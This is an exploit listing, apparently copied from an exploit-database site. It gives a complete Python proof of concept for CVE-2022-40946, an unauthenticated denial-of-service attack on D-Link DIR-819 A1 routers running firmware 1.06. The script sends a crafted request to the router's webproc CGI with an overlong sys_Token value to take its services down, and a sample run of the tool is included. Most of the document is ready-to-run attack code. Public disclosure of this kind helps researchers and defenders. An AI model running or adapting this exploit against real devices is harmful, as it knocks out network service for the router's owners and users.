Exploit for D-Link DIR 819 A1 Denial Of Service CVE-2022-40946

Name: Exploit for D-Link DIR 819 A1 Denial Of Service CVE-2022-40946
Rating: 5 (106 reviews)
2023-03-27 | CVSS 7.6
## https://sploitus.com/exploit?id=PACKETSTORM:171484
# Exploit Title: DLink DIR 819 A1 - Denial of Service   
# Date: 30th September, 2022  
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)  
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router  
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)  
# Tested on: Firmware Version - 1.06 Hardware Version - A1  
# CVE : CVE-2022-40946  
#  
# Github: https://github.com/whokilleddb/dlink-dir-819-dos  
#  
# $ ./exploit.py -i 192.168.0.1   
# [+] DLink DIR-819 DoS exploit  
# [i] Address to attack: 192.168.0.1  
# [i] Using SSL: False  
# [i] Request Timeout: 30s  
# [i] Buffer Length: 19  
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522  
# [+] Exploit Successful!  
  
#!/usr/bin/env python3  
import sys  
import string  
import urllib3  
import requests  
import argparse  
import random  
import socket  
from rich import print  
  
  
# Disable SSL Warnings  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
  
# Globals  
TIMEOUT = 30  
#BUFFER_LEN = 19  
BUFFER_LEN = 32  
  
# Class to exploit  
class Exploit:  
def __init__(self, ip, is_ssl):  
"""Initialize the constructor"""  
  
self.ip = ip  
self.is_ssl = is_ssl  
  
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"  
  
if self.is_ssl:  
self.payload = f"https://{_payload}"  
else:  
self.payload = f"http://{_payload}"  
  
  
def show(self):  
"""Show the parameters"""  
  
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")  
  
  
def run(self):  
"""Run the exploit"""  
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")  
self.show()  
  
try:  
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)  
if "Internal Error" in r.text:  
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")  
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")  
else:  
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")   
  
except requests.exceptions.Timeout:  
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")  
  
except Exception as e:  
print(f"Error occured as: {e}")  
  
  
def main():  
"""Main function to run"""  
  
parser = argparse.ArgumentParser(  
description="DLink DIR-819 Unauthenticated DoS")  
parser.add_argument('-i', '--ip', required=True, help="IP of the router")  
parser.add_argument('-s', '--ssl', required=False, action="store_true")  
  
opts = parser.parse_args()  
  
try:  
ip = socket.gethostbyname(opts.ip)  
except socket.error:  
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)  
return  
  
is_ssl = opts.ssl  
  
exploit = Exploit(ip, is_ssl)  
exploit.run()  
  
  
if __name__ == '__main__':  
main()